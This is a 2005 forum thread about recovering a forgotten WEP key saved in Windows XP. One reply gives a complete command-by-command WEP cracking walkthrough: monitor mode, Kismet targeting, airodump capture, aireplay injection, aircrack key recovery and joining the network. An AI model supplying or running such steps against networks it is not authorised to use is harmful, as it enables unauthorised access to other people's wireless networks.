Advertisement
If you have a new account but are having problems posting or verifying your account, please email us on hello@boards.ie for help. Thanks :)
Hello all! Please ensure that you are posting a new thread or question in the appropriate forum. The Feedback forum is overwhelmed with questions that are having to be moved elsewhere. If you need help to verify your account contact hello@boards.ie
Hi there,
There is an issue with role permissions that is being worked on at the moment.
If you are having trouble with access or permissions on regional forums please post here to get access: https://www.boards.ie/discussion/2058365403/you-do-not-have-permission-for-that#latest

Retrieve a WEP key?

  • 12-09-2005 4:54am
    #1
    Duffman
    Closed Accounts Posts: 1,248 ✭✭✭


    Is there any way to retrieve a WEP key that has been entered into the masked field and saved in Windows XP's wireless config dialogues?

    Thanks.


Comments

  • #2
    mp3guy
    Registered Users, Registered Users 2 Posts: 3,977 ✭✭✭mp3guy


    No, the only way to get it now is off the router


  • #3
    irlrobins
    Registered Users, Registered Users 2 Posts: 7,541 ✭✭✭irlrobins


    I think i have a prog at home that can reveal contents of masked fields. I'll try and find it and see if that helps you. Is this for legit purposes? Or you trying to get access to a network you shouldn't?

    R


  • #4
    digitaldeath
    Registered Users, Registered Users 2 Posts: 279 ✭✭digitaldeath


    Or you could do it the hard (but fun) way and crack it!
    Here's how.
    Download Auditor which is a bootable version of linux.
    Boot from the CD.
    Once in, open a terminal window and type "iwconfig" (without the double quotes) to find out your wifi interface. In my case it's ath0.

    Enable it:
    ifconfig ath0 up

    Set it to monitor:
    iwconfig ath0 mode monitor

    Insert USB key to conserve memory (this is not required!)
    qtparted

    Make note of USB location in the window (sda1, usb1, whatever)
    mount /dev/sda1 /mnt/hd
    cd /mnt/hd

    Start Kismet (a wifi scanning tool)
    Select a location on your USB key for file dumps.
    Once it's found your AP - press "L" (notice CAP L) to lock to it. ("s" will sort, "c" to sort by channel)
    Press ENTER to get TARGETMACADDRESS of your access point (AP).

    Next we gotta capture packets. Make sure you're "in" your USB key location.
    airodump ath0 tocrack TARGETMACADDRESS

    New terminal window. Speed up the IV count to crack it - or if you're getting alot already, there's no need!
    aireplay -i ath0

    New terminal window. Crack outputted file (in our case we called it "tocrack" above) when you've about 200,000+ IVs (the more - the better!)
    airecrack -q 3 -f 2 tocrack.cap

    To associate with AP once the key is found type:
    iwconfig ath0 mode Managed key INSERTWEPKEYHERE

    Get IP address
    dhclient

    Test connection
    ping www.google.com

    Hopefully this will come in useful somehow - any further questions (after trying Google of course) PM me.
    All of this worked for me and I broke my key in 21 mins. Obviously a default Eircom wifi router key! ;)

    Later!


  • #5
    irlrobins
    Registered Users, Registered Users 2 Posts: 7,541 ✭✭✭irlrobins


    ok this prob might reveal password field contents

    http://www.foundstone.com/index.htm?subnav=resources/navigation.htm&subcontent=/resources/proddesc/showin.htm


Advertisement